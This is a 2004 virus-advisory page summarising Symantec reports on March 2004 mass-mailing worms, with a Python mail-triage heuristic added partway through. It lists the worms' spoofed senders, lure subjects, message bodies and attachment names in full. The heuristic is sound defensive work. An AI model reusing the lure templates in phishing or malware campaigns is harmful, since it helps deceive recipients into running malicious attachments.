 
Virus News 

 

 


 

 

March 2004

Select the links for detailed information and removal tools for the latest viruses


W32.Netsky.R 3/31/2004 2
W32.Beagle.V 3/29/2004 2
W32.Sober.E 3/27/2004 2
W32.Beagle.U 3/26/2004 3
W32.Snapper.A 3/24/2004 2
W32.Blackmal 3/23/2004 2
W32.Gaobot.SA 3/23/2004 2
W32.HLLW.Lovgate.O 3/23/2004 2
W32.Netsky.P 3/21/2004 3
W32.Netsky.Q 3/21/2004 3
W32.Witty.Worm 3/20/2004 2
W32.HLLW.Antinny.G 3/19/2004 2
W32.HLLW.Polybot 3/19/2004 2
W32.Beagle.T 3/18/2004 2
W32.Beagle.S 3/18/2004 2
W32.Beagle.R 3/18/2004 2
W32.Beagle.O 3/18/2004 2
W32.HLLW.Lovgate.N 3/17/2004 2
W32.Netsky.O 3/17/2004 2
W32.Netsky.N 3/15/2004 2
W32.Beagle.N 3/15/2004 2
W32.Beagle.M 3/13/2004 3
W32.Cone.D 3/10/2004 2
W32.Netsky.M 3/10/2004 2
W32.Netsky.L 3/9/2004 2
W32.Cone.C 3/9/2004 2
W32.Netsky.K 3/8/2004 3
W32.Keco 3/8/2004 2
W32.Netsky.J 3/8/2004 2
W32.Sober.D 3/7/2004 2
W32.Netsky.I 3/7/2004 2
W32.Netsky.H 3/5/2004 2
W32.Netsky.G 3/4/2004 2
W32.Mydoom.H 3/3/2004 2
W32.Beagle.K 3/3/2004 2
W32.Netsky.F 3/2/2004 2
W32.Beagle.J 3/2/2004 3
W32.Hiton 3/2/2004 2
W32.Mydoom.G 3/2/2004 2
W32.Beagle.I 3/1/2004 2
W32.Beagle.H 3/1/2004 2
W32.Netsky.E 3/1/2004 2
W32.Netsky.D 3/1/2004 4

   
 

W32.Netsky.D@mm
Discovered March 1, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.D@mm is a mass-mailing worm that is a variant of W32.Netsky.C@mm. The worm scans drives C through Z for email addresses and sends itself to those that are found.

The Subject, Body, and Attachment names vary. The attachment will have a .pif file extension.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.d@mm.html


W32.Netsky.E@mm
Discovered March 1, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.E is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives. This worm also searches drives C through Y for folders that have names containing "Shar," and then copies itself to those folders.

The Subject, Body, and Attachment vary.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.e@mm.html


W32.Beagle.H@mm
Discovered March 1, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.H@mm is a mass-mailing worm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email. It also sends the attacker the port on which the backdoor listens, as well as the IP address. The email attachment is a randomly named .exe file inside a .zip file. The embedded .exe file is password-protected with a random password.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.h@mm.html


W32.Beagle.I@mm
Discovered March 1, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.I@mm is a mass-mailing worm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email. It also sends the attacker the port on which the backdoor listens, as well as the IP address. The email attachment is a randomly named .exe file inside a .zip file. The embedded .exe file is password-protected with a random password. W32.Beagle.I@mm also attempts to spread across file-sharing networks, such as Kazaa and iMesh, by dropping itself into the directories that contain "shar" in their names.

From: <spoofed>
Subject: <variable>
Attachment: <random characters>.zip, containing an executable <random characters>.exe

W32.Beagle.I@mm is functionally identical to W32.Beagle.H@mm.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.i@mm.html


W32.Mydoom.G@mm
Discovered March 2, 2004

Systems Affected: All Windows32 Systems

The W32.Mydoom.G@mm worm:

Is a mass-mailing worm that opens a backdoor on TCP ports 80 and 1080
Can download and execute arbitrary files
Performs a Denial of Service (DoS) against www.symantec.com.

The worm arrives as an attachment with the file extension .bat, .com, .cmd, .exe, .pif, .scr, or .zip. The From: line of the email may be spoofed.

• Sends to email addresses found in the files with specified extensions.
• May delete the files with certain extensions. For example, .jpg, .avi, and .bmp.
• Performs DoS against www.symantec.com.
• Allows unauthorized remote access.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.mydoom.g@mm.html


W32.Hiton@mm
Discovered March 2, 2004

Systems Affected: All Windows32 Systems

Symantec Security Response has received reports of a new mass-mailing worm. At this time we have received no customer submissions of this threat. A sample has been obtained and we will provide information as our analysis progresses.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hiton@mm.html


W32.Beagle.J@mm
Discovered March 2, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.J@mm is a mass-mailing worm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email. It also sends the attacker the port on which the backdoor listens, as well as the IP address.

The email attachment is a randomly named .exe file inside a .zip file, or an executable .pif file. The .zip file will be password-protected. The From address is spoofed to appear as though it is coming from one of the following addresses at the recipient's domain: management, administration, staff, noreply, or support.

W32.Beagle.J@mm also attempts to spread across file-sharing networks, such as Kazaa and iMesh, by dropping itself into the directories that contain "shar" in their names.


Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.j@mm.html


W32.Netsky.F@mm
Discovered March 3, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.F@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The Subject, Body, and Attachment vary.

Note: Symantec Security Response is currently investigating this worm. More information will be published as soon as it is available.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.f@mm.html


W32.Beagle.K@mm
Discovered March 3, 2004

Systems Affected: All Windows32 Systems

The W32.Beagle.K@mm worm:

Is a variant of W32.Beagle.J@mm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email.
Sends the attacker the port on which the backdoor listens, as well as the IP address.
Attempts to spread through file-sharing networks, such as Kazaa and iMesh, by dropping itself into the folders that contain "shar" in their names.

The email has the following characteristics:
From: Spoofed to appear as though it is coming from one of the following addresses at the recipient's domain:
management
administration
staff
noreply
support
Attachment: A randomly named .exe file that is inside a .zip file or a .pif file. The .zip file will be password-protected.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.k@mm.html


W32.Mydoom.H@mm
Discovered March 3, 2004

Systems Affected: All Windows32 Systems

The W32.Mydoom.H@mm worm:

Is a mass-mailing worm that opens a backdoor on TCP ports 80 and 1080
Can download and execute arbitrary files
Performs a Denial of Service (DoS) against www.symantec.com.
Sends to the email addresses found in the files with specified extensions.
May delete the files with certain extensions. For example, .jpg, .avi, and .bmp.
Name of attachment varies with an extension of .pif, .scr, .exe, .cmd, .com, .bat, or .zip; may have double extensions.

The worm arrives as an attachment with the file extension .bat, .com, .cmd, .exe, .pif, .scr, or .zip. The From: line of the email may be spoofed.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.mydoom.h@mm.html


W32.Netsky.G@mm
Discovered March 4, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.G@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The Subject, Body, and Attachment vary.

If an infected computer's time is between 6:00 A.M. and 9:00 A.M. on Tuesday, March 10, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.g@mm.html


W32.Netsky.H@mm
Discovered March 5, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.H@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The Subject, Body, and Attachment vary.

If an infected computer's system clock is between 11:00 A.M. and 12:00 P.M. on March 8th, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.h@mm.html


W32.Netsky.I@mm
Discovered March 7, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.I@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The email has the following characteristics:
Subject: (One of the following)

Mail account expired
Mail account closed
Mail account deactivated

Body: (One of the following)

Your mail account expired. Please follow the link to reactivate.
Your mail account has been closed. Click on the link for further details.
Your mail account has been deactivated. To reactivate, follow the link.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.i@mm.html


W32.Sober.D@mm
Discovered March 7, 2004

Systems Affected: All Windows32 Systems

W32.Sober.D@mm is a mass-mailing worm that replicates in the form of an email using its own SMTP client engine. The subject and the body of the email vary and are written in either English or German. W32.Sober.D@mm is a Visual Basic application, packed with UPX.

Sober.D disguises itself as a Microsoft Update in both English and German language versions. According to the antivirus company, copies of the Sober.D worm arrive in e-mail messages with the subject "Microsoft Alert: Please Read!" or "Microsoft Alarm: Bitte Lesen!" The worm file is embedded in file attachments with the .exe or .zip file extension and names such as "Patch," "MS-Security" and "UpDate."

The worm displays the following messages:

• This patch has been successfully installed.
• This patch does not need to be installed on this system.
• Microsoft Windows
STOP: 0x80070725 {FatalSystemError}
System File [filename].exe
Connection lost or blocked by Firewall

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.sober.d@mm.html


W32.Netsky.J@mm
Discovered March 8, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.J@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The sent email will have the following characteristics:

Subject: One of the following:
Your product
Your letter
Re: corrected homework
Re: I've found your document
Re: Your bill
Re: hello again
Re: hi again
Re: part 3
Re: important document part 2
Re: important
Re: Your data
Re: Your application
Re: your music
Re: excel document
Re: Re: Re: word document
Re: Your details
Re: My details
Re: Your requested file
Re: Read it immediately
Re: Approved
Re: Your software
Re: my memberlist
Re: Your document
Re: Your file
Re: Your important document
www.%s.tripod.com
Hi Mr. %s
Moi %s
He %s
Yours faithfully, %s
Message to %s
Hi Mrs. %s
Is %s.doc yours?
Is %s.xls yours?
Whats up %s
www.paypal.com/%s
Na %s
Best %s
Love %s
Good morning %s
Have a good day %s
Dear %s
To %s , it's me
Welcome %s
Moin %s
Hello %s
Your account %s is expired!
Hey %s
Hi %s
www.%s.freepage.com, your website
Hi %s, your product
Hello %s, your letter
Re: Hi %s, your archive
Re: %s, your text
Re: Hello %s, your bill
Re: Hi %s, your details
Re: Hello %s, my details
Re: Hi %s, your word file
Re: Hello %s, your excel file
Re: Hi %s, details
Re: Hello %s, Approved
Re: Hello %s, your software
Re: Hi %s, your music
Re: Dear %s, Here
Re: Re: Re: Hello %s, your document
Re: Hi %s
Re: Dear %s, Hi
Re: Re: Hi %s, your message
Re: Here %s, your picture
Re: Hi %s, here is the document
Re: Hello %s, your document
Re: %s, thanks!
Re: Re: %s, thanks!
Re: Re: Hi %s, document
Re: Hello %s, document

Where %s is the portion of the "To" address before the "@".

Body: One of the following:
Your file is attached. Use this password for the file: %i.
Please read the attached file. Password for the file is %i.
Please have a look at the attached file. Password for decrypting is %i.
See the attached file for details. Password is %i.
Here is the file. My password is %i.
Your document is attached. Your password is %i.

Where %i is a random number.

Attachment: A password-protected zip file containing one of the following files:
website_%s.pif
your_product_%s.pif
letter_%s.pif
archive%s.pif
your_text%s.pif
bill_%s.pif
your_details%s.pif
%s_details.pif
%s_document_word.pif
%s_document_excel.pif
%s_my_details.pif
%s_all_document.pif
%s_application.pif
mp3music_%s.pif
yours%s.pif
document_%s4351.pif
%s_picture.pif
%s_file.pif
%s_message_details.pif
yourpicture%s.pif
%s_document_full.pif
%s_your_message_part2.pif
%sinformation.pif
%sdocument.pif
%s_your_document.pif

Where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.j@mm.html


W32.Keco@mm
Discovered March 8, 2004

Systems Affected: All Windows32 Systems

W32.Keco@mm is a mass-mailing worm that spreads via its own SMTP engine. It mails itself to all email addresses it finds on an infected computer.

If the mail cannot be sent, the worm continues to open ports sequentially. This could freeze a system.

Displays a message box that says, "Now this will try to send a mail to Askel ;D"

Creates a file C:\coke.txt, which contains rude messages to other worm writers.

Creates a mail message which may contain one of the following subjects:
Your details
Your File
Your document
eCard sent to you
My File
Your picture
My picture
You got a pic ?
You got image ?
You got picture?
Pic?
Image?
File?
File!
Document!
The document
Yours
New document
New File
Your ZIP
My private pics
My private files
My private images
My private documents
My private textes
the text
the poem
a Poem
a Text
a Picture
a Image
My Text
My Poem
Did you like my poem?
Did you like my text?
2 Poem
some text
whos picture ?
a Joke
Image of you
Links
profile
your profile
Its me :)
Im back :D
hello dude
whats up?
sup ?
i got a problem
warning, its me
warning, im hot
s--t man :P
haha there you are
ive searched for you :D
wow, im so cool
what you want ?
hey, stop buggin me
is it just me?
great
doesnt matter to me
which u want?
gr8 :)
hahahahahahaha :D
are you jesus? ;D
she said what i was supposed to think :P
Cute, Boring, Love.
cute boring love :P
its whats its all about
i like apple juice
coke just rules done you think ?
i want to trademark
i want to own you
i want you
i want to have you
dont you longing for purity ?
dont you ever gets so sick of territories ?
i am naked
man im nude
dude, im nude
what are you so scared of ?
sick of spam? so am i :/
s--t s--t s--t
do you trust me?
do i trust you?
do you know me?
do i know you?
i eat glass :D
i can walk on the water
this is so sick man :D
check it out, its sick :D
WOW, powerlevel up :D
wow hahaha
wow, if this aint pron, then i dont know what it is
i made a mistake :(
is this a mistake ?
do you have a mistake ?
i made a mistake
are you intrested in making movies?
making movies ?
getting money?
i love money
do you love money?
i got a picture of you and me
i got a picture of you
i got a picture of me
you got a picture of us
you got a picture of me
you got a picture ?
i hate to be singel
i hate to not be lesbian
i hate to be gay
i hate to be a homosexual
i am a lesbian
i hate fags
are you a f-g?
is this right mail?
is this james?
is this kirk?
is this kurt?
is this rutger?
is this stefan?
is this stephen?
is this mary?
is this julie?
is this ?
is ?
want to listen on some music?
oh yea, thats how i like it
how i like it
oh yea
im afraid
im not afraid
im afraid of dieing
im afraid of begin ignore
im afraid of feeling
im not afraid of trying
do you got msn?
do you got icq?
do you got aim?
do you got mail? :D
where is the sky?
i am hiding
noone knows, just u and i
just u and i
U and i
U + I
I + U
i see everything :D
Best i am
I am Best
Am best I
Am i Best
Best Am I
i Best Am
blah blah blah
words, i hate words
w0rd

The subject may be preceded with Re: , re: , Fwd: or FWD:

The worm opens TCP ports sequentially, starting with port 1025, in its attempt to spread.

It attempts to connect to predefined IRC servers via IRC port 6667. User names are random, but always end with domain "@foo.bar."

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.keco@mm.html


W32.Netsky.K@mm
Discovered March 8, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.K@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

The email has the following characteristics:

From: Spoofed

Subject: The subject line is one of the following:

Re: Your website
Re: Your product
Re: Your letter
Re: Your archive
Re: Your text
Re: Your bill
Re: Your details
Re: My details
Re: Word file
Re: Excel file
Re: Details
Re: Approved
Re: Your software
Re: Your music
Re: Here
Re: Re: Re: Your document
Re: Hello
Re: Hi
Re: Re: Message
Re: Your picture
Re: Here is the document
Re: Your document
Re: Thanks!
Re: Re: Thanks!
Re: Re: Document
Re: Document

Message: The message is one of the following:

Your file is attached.
Please read the attached file.
Please have a look at the attached file.
See the attached file for details.
Here is the file.
Your document is attached.

Attachment: The attachment is one of the following:

your_website.pif
your_product.pif
your_letter.pif
your_archive.pif
your_text.pif
your_bill.pif
your_details.pif
document_word.pif
document_excel.pif
my_details.pif
all_document.pif
application.pif
mp3music.pif
yours.pif
document_4351.pif
your_file.pif
message_details.pif
your_picture.pif
document_full.pif
message_part2.pif
document.pif
your_document.pif

If the system time is between 6:00 A.M. and 9:00 A.M. on Tuesday, March 2, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.k@mm.html


W32.Cone.C@mm
Discovered March 9, 2004

Systems Affected: All Windows32 Systems

W32.Cone.C@mm is a minor variant of W32.Cone@mm. The worm sends itself to the email addresses it gathers from the files on an infected computer. The worm also modifies the local hosts file to prevent access to various websites.

The attachment will have an .exe, .scr, or .zip file extension.

From: <Spoofed>

Subject: (One of the following)
How cute is your credit card number!! :))
E-mail account disabling warning for <name>
RE: <name>
i have your password :)
RE: Thank You!
RE: details (<name>)
Password Reset For <name>
Undelivered Mail Returned to Sender (<name>)
about you
Your account (<name>) will be closed
Your IP has been logged
Mail Delivery System (<name>)
Mail Transaction Failed (<name>)
IMPORTANT <name>!
Confidential user information!

Attachment: (One of the following)
unknown.exe
unknown.scr
document.exe
document.scr
nothing.exe
nothing.scr
password.exe
password.scr
information.exe
information.scr
hello.exe
hello.scr
text.txt.exe
untitled.exe
secret!!.exe
unknown1.exe
CoolText.exe
EULA-USA.exe
readmeUS.exe
<random>.zip

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.cone.c@mm.html


W32.Netsky.L@mm
Discovered March 9, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.L@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

The email has the following characteristics:

From: <Spoofed>

Subject: The subject line is one of the following:

Re: Important
Re: Your document
Re: Your details
Re: Approved

Message: The message is one of the following:

Your file is attached.
Please read the document.
Your document is attached.
Please read the attached file.
Please see the attached file for details.

Attachment: The attachment is one of the following:

your_file_%s.pif
details_%s.pif
document_%s.pif
%s.pif

where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.l@mm.html


W32.Netsky.M@mm
Discovered March 10, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.M@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

The email has the following characteristics:

From: <Spoofed>

Subject: The subject line is one of the following:

Re: <%s> Requested file
Re: <%s> My file
Re: <%s> My document
Re: <%s> My information
Re: <%s> My details
Re: <%s> Information
Re: <%s> Improved
Re: <%s> Requested document
Re: <%s> Document
Re: <%s> Details
Re: <%s> Your document
Re: <%s> Your details
Re: <%s> Approved

Message: The message is one of the following:

Details for %s.
Document %s.
I have received your document. The improved document %s is attached.
I have attached your document %s.
Your document %s is attached to this mail.
Authentification for %s required.
Requested file %s.
See the file %s.
Please read the important message msg_%s.
Please confirm the document %s.
%s is attached.
Your file %s is attached.
Please read the document %s.
Your document %s is attached.
Please read the attached file %s.
Please see the attached file %s for details..

Attachment: The attachment is one of the following:

improved_%s.pif
message_%s.pif
detailed_%s.pif
your_document_%s.pif
word_doc_%s.pif
doc_%s.pif
articel_%s.pif
picture_%s.pif
file_%s.pif
your_file_%s.pif
details_%s.pif
document_%s.pif
%s.pif

where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.m@mm.html


W32.Cone.D@mm
Discovered March 10, 2004

Systems Affected: All Windows32 Systems

W32.Cone.D@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it gathers from the files on an infected computer.

The attachment will have an .exe or .zip file extension.

The email has the following characteristics:
From: Spoofed
Subject: The subject is one of the following:

RE: the attachment is in the SKY [weN]
How cute is your credit card number!! :))
E-mail account disabling warning for %s
the attachment is in the SKY [weN]
Hi
i have your password :)
RE: Thank You!
RE: details (%s)
Password Reset For %s
Undelivered Mail Returned to Sender (%s)
about you
Your account (%s) will be closed
Your IP has been logged
Mail Delivery System (%s)
Mail Transaction Failed (%s)
IMPORTANT %s!
Confidential user information!

where %s is the recipient name.

Message: The message is one of the following:

Hi lucky,
The attachment is a virus do not open it.
I write it to say : we don't want islamic republic in IRAN!
I'm realy sorry, I'm damaging some computers that I don't want to damage!!!!

Dear user of <recipient name>,

We warn you about some attacks on your e-mail account. Your computer may contain viruses, in order to keep your computer and e-mail account safe,
please, follow the instructions.

The Management,
The <recipient's domain> team http: //www.<recipient's domain>

take it easy
I have your password :)
The zip archive attached.<br>extract it and then read the text file!
i zip your password (and some other info) :))
I have it too!
you can change it, but...!

Warning!!!
This message contains (attached) users personal info and you may not use it for personal use,
remember that you accept the agreement,
and you are responsible for any kind of misuse of the users personal info.
i zip it for you.
i can't find anything usefull in your attachment.
See the attached file for details
your credit card information attached :))
do you can imagine?
a <random letters> in a zip file!
The message contains Unicode (Chinese) characters and has been sent as an attachment (in binary).
Details Attached.

Attachment: The attachment file name is <eight random letters or digits>.exe. The worm may send a zip archive of itself.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.cone.d@mm.html


W32.Beagle.M@mm
Discovered March 13, 2004

Systems Affected: All Windows32 Systems

The W32.Beagle.M@mm is a polymorphic mass-mailing worm that uses its own SMTP engine to spread through email. Like previous Beagle variants, this worm opens a backdoor (it listens on TCP port 2556), and attempts to spread through file-sharing networks by copying itself to folders that contain "shar" in their names. W32.Beagle.M@mm also infects files with the EXE extension.

The email has the following characteristics:

From: Spoofed to appear as though it is coming from one of the following addresses at the recipient's domain:

management
administration
staff
noreply
support

Subject: One of the following:
Account notify
E-mail account disabling warning.
E-mail account security warning.
E-mail technical support message.
E-mail technical support warning.
E-mail warning
Email account utilization warning.
Email report
Encrypted document
Fax Message Received
Forum notify
Hidden message
Important notify
Important notify about your e-mail account.
Incoming message
Notify about using the e-mail account.
Notify about your e-mail account utilization.
Notify from e-mail technical support.
Protected message
RE: Protected message
RE: Text message
Re: Document
Re: Hello
Re: Hi
Re: Incoming Fax
Re: Incoming Message
Re: Msg reply
Re: Thank you!
Re: Thanks :)
Re: Yahoo!
Request response
Site changes

Attachment: A randomly named .exe file, stored inside a .zip file or a .rar file, or a .pif file. The .zip and .rar files may be password-protected. The filename, minus the extension, is one of the following:
Attach
Details
Document
Encrypted
Gift
Info
Information
Message
MoreInfo
Readme
Text
TextDocument
details
first_part
pub_document
text_document

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.m@mm.html


W32.Beagle.N@mm
Discovered March 15, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.N@mm is a polymorphic mass-mailing worm that uses its own SMTP engine to spread through email. Like previous Beagle variants, this worm opens a backdoor (it listens on TCP port 2556), and attempts to spread through file-sharing networks by copying itself to folders that contain "shar" in their names. W32.Beagle.N@mm also infects files with the EXE extension.

The email has the following characteristics:

From: Spoofed to appear as though it is coming from one of the following addresses at the recipient's domain:

management
administration
staff
antivirus
antispam
noreply
support

Subject: One of the following:
Account notify
E-mail account disabling warning.
E-mail account security warning.
E-mail technical support message.
E-mail technical support warning.
E-mail warning
Email account utilization warning.
Email report
Encrypted document
Fax Message Received
Forum notify
Hidden message
Important notify
Important notify about your e-mail account.
Incoming message
Notify about using the e-mail account.
Notify about your e-mail account utilization.
Notify from e-mail technical support.
Protected message
RE: Protected message
RE: Text message
Re: Document
Re: Hello
Re: Hi
Re: Incoming Fax
Re: Incoming Message
Re: Msg reply
Re: Thank you!
Re: Thanks :)
Re: Yahoo!
Request response
Site changes

Attachment: A randomly named .exe file, stored inside a .zip file or a .rar file, or a .pif file. The .zip and .rar files may be password-protected. The filename, minus the extension, is one of the following:
Attach
Details
Document
Encrypted
Gift
Info
Information
Message
MoreInfo
Readme
Text
TextDocument
details
first_part
pub_document
text_document

Read the full Symantec report:
http://www.sarc.com/avcenter/venc/data/w32.beagle.n@mm.html


W32.Netsky.N@mm
Discovered March 16, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.N@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

The email has the following characteristics:

From: <Spoofed>

Subject: The subject line is composed of multiple parts.

The first part may be one of the following:

Re:
Re: Re:


The second part may be one of the following:

my
your
[blank]


And the third part may be one of the following:

application
approved
approved
bill
corrected
data
details
document
document_all
excel document
file
hello
here
hi
important
important
improved
information
letter
message
patched
product
read it immediately
screensaver
text
thanks!
website
word document

Message: The message is one of the following:

Authentication required.
I have attached your document.
I have received your document. The corrected document is attached.
Please confirm the document.
Please read the attached file.
Please read the document.
Please read the important document.
Please see the attached file for details.
Requested file.
See the file.
Your details.
Your document is attached to this mail.
Your document is attached.
Your document.
Your file is attached.

Followed by:
--------------------------------------------
(attachment_name) : No virus found
Powered by the new Norton OnlineScan
Get protected: www.symantec.com

Attachment: The attachment is one of the following with a .zip, .pif, .exe, or .scr extension:

application_%s
approved_%s
bill_%s
data_%s
details_%s
document_%s
document_all_%s
excel document_%s
file_%s
important_%s
information_%s
letter_%s
message_%s
product_%s
screensaver_%s
text_%s
website_%s
word document_%s

where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.n@mm.html
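
Added example (not part of the Symantec write-ups or of this page's original text): a mail-gateway triage heuristic in Python built from the traits listed in the entries above, namely Netsky attachment names that embed the recipient's local part (%s), Beagle senders spoofed as role addresses at the recipient's domain, and executable or double extensions. The function names, the DECOY_EXT list and the example.com messages are constructed for illustration.

```python
"""Heuristic triage of inbound mail against traits listed in the entries above."""
import os
from email import message_from_string
from email.message import EmailMessage
from email.utils import parseaddr

# Role names the Beagle.J/K/M/N entries list as spoofed senders.
ROLE_SENDERS = {"management", "administration", "staff", "noreply",
                "support", "antivirus", "antispam"}
# Directly executable extensions named across the entries.
EXEC_EXT = {".pif", ".scr", ".exe", ".com", ".bat", ".cmd"}
# Archive wrappers the Beagle and Netsky entries mention.
ARCHIVE_EXT = {".zip", ".rar"}
# Assumption: harmless-looking extensions used as the first half of a double extension.
DECOY_EXT = {".txt", ".doc", ".xls", ".jpg", ".htm"}


def split_addr(header_value):
    """Return (local_part, domain) of an address header, lower-cased."""
    _, addr = parseaddr(header_value or "")
    local, _, domain = addr.lower().partition("@")
    return local, domain


def attachment_names(msg):
    """Yield the lower-cased file name of every MIME part that carries one."""
    for part in msg.walk():
        name = part.get_filename()
        if name:
            yield name.lower()


def score_message(raw):
    """Return the sorted list of heuristic findings for one raw message."""
    msg = message_from_string(raw)
    from_local, from_domain = split_addr(msg["From"])
    to_local, to_domain = split_addr(msg["To"])
    findings = set()

    for name in attachment_names(msg):
        stem, ext = os.path.splitext(name)
        inner_ext = os.path.splitext(stem)[1]
        risky = ext in EXEC_EXT or ext in ARCHIVE_EXT

        if ext in EXEC_EXT:
            findings.add("executable-attachment")
        # e.g. text.txt.exe from the W32.Cone.C@mm attachment list
        if ext in EXEC_EXT and inner_ext in DECOY_EXT:
            findings.add("double-extension")
        # Netsky templating: %s is the part of the "To" address before the "@".
        # Very short local parts are skipped to limit accidental matches.
        if risky and len(to_local) >= 3 and to_local in stem:
            findings.add("recipient-name-in-attachment")
        # Beagle spoofing: role account at the recipient's own domain.
        if (risky and from_local in ROLE_SENDERS
                and from_domain and from_domain == to_domain):
            findings.add("role-sender-at-recipient-domain")
    return sorted(findings)


def build_sample(sender, recipient, subject, filename):
    """Build a constructed test message with a harmless placeholder attachment."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = sender, recipient, subject
    m.set_content("Your document is attached.")
    m.add_attachment(b"placeholder", maintype="application",
                     subtype="octet-stream", filename=filename)
    return m.as_string()


if __name__ == "__main__":
    # Constructed samples; addresses use reserved example domains.
    samples = [
        ("someone@example.org", "jsmith@example.com",
         "Re: Your document", "document_jsmith.pif"),
        ("support@example.com", "jsmith@example.com",
         "E-mail account security warning.", "Details.zip"),
        ("friend@example.org", "jsmith@example.com",
         "RE: Thank You!", "text.txt.exe"),
        ("support@example.com", "jsmith@example.com",
         "Monthly report", "report.pdf"),
    ]
    for sender, rcpt, subject, fname in samples:
        print(fname, "->", score_message(build_sample(sender, rcpt, subject, fname)))
```

Treat the findings as triage signals to combine with content scanning, since a legitimate attachment can also carry the recipient's name.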


W32.Netsky.O@mm
Discovered March 17, 2004

Systems Affected: All Windows32 Systems

W32.Netsky.O@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The "sender" of the email is spoofed, and the subject line and message body vary. The attachment is one of the following:

readme.pif
document.pif
data.pif
details.pif
msg.pif
message.pif

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.o@mm.html


W32.Beagle.O@mm
Discovered March 18, 2004

Systems Affected: All Windows32 Systems

W32.Beagle.O@mm is a polymorphic mass-mailing worm that uses its own SMTP engine to spread through email. The worm opens a backdoor on TCP port 2556 and attempts to spread through file-sharing networks by copying itself to the folders that contain "shar" in their names. W32.Beagle.O@mm also infects files with the .exe file extension. The email has the following characteristics:

From: Spoofed to appear as though it is coming from a predetermined address at the recipient's domain.
Subject: Varies
Attachment: A randomly named .exe file, stored inside a .zip file, a .rar file, or a .pif file. The .zip and .rar files may be password-protected.

W32.Beagle.O@mm exploits the vulnerability described in Microsoft Security Bulletin MS03-040 to propagate. Symantec Security Response is currently investigating this aspect of the threat and will post more information as it becomes available.
Symantec Security Response has developed a removal tool to clean the infections of W32.Beagle.O@mm.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.o@mm.html


W32.Beagle.R@mm
Discovered March 18, 2004

Systems Affected: All Windows32 Systems

